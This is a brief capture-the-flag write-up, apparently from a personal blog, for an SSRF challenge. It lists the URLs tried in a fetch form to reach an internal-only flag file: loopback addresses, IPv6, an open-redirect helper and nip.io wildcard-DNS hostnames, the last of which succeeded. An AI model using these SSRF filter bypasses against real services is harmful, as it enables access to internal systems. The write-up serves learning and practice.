Do Not Serve
![](https://i0.wp.com/sukhmeet.com/wp-content/uploads/2023/10/image-24-edited.png?resize=1158%2C713&ssl=1)
This was a simple SSRF level.
A link is given which is showing 403 Forbidden page. As the description on page says, it can be accessed internally.
A form is given to load any URL.
Entered the link to flag.txt as it is.http://51.15.92.102:8080/flag.txt
![](https://i0.wp.com/sukhmeet.com/wp-content/uploads/2023/10/image-26.png?resize=844%2C967&ssl=1)
Tried local IPhttp://127.0.0.1:8080/flag.txt
![](https://i0.wp.com/sukhmeet.com/wp-content/uploads/2023/10/image-29.png?resize=560%2C129&ssl=1)
Tried local IP ki behanhttp://[::]:8080/flag.txt
![](https://i0.wp.com/sukhmeet.com/wp-content/uploads/2023/10/image-29-edited.png?resize=337%2C78&ssl=1)
Tried local IP ki mummyhttp://127.0.0.1.nip.io:8080/flag.txt
![](https://i0.wp.com/sukhmeet.com/wp-content/uploads/2023/10/image-29-edited-1.png?resize=187%2C43&ssl=1)
Tried the redirection https://b99.in/ssrf.php?to=http%3A%2F%2F51.15.92.102%3A8080%2Fflag.txt
![](https://i0.wp.com/sukhmeet.com/wp-content/uploads/2023/10/image-28.png?resize=715%2C124&ssl=1)
And server did not like b99 either.
Tried SSRF bypass trickhttp://51.15.92.102.nip.io:8080/flag.txt
![](https://i0.wp.com/sukhmeet.com/wp-content/uploads/2023/10/image-30.png?resize=841%2C416&ssl=1)
It worked! Gave a link that had the code.
![](https://i0.wp.com/sukhmeet.com/wp-content/uploads/2023/10/image-31.png?resize=247%2C212&ssl=1)
Entered the code in the form and got the flag.
Leave a Reply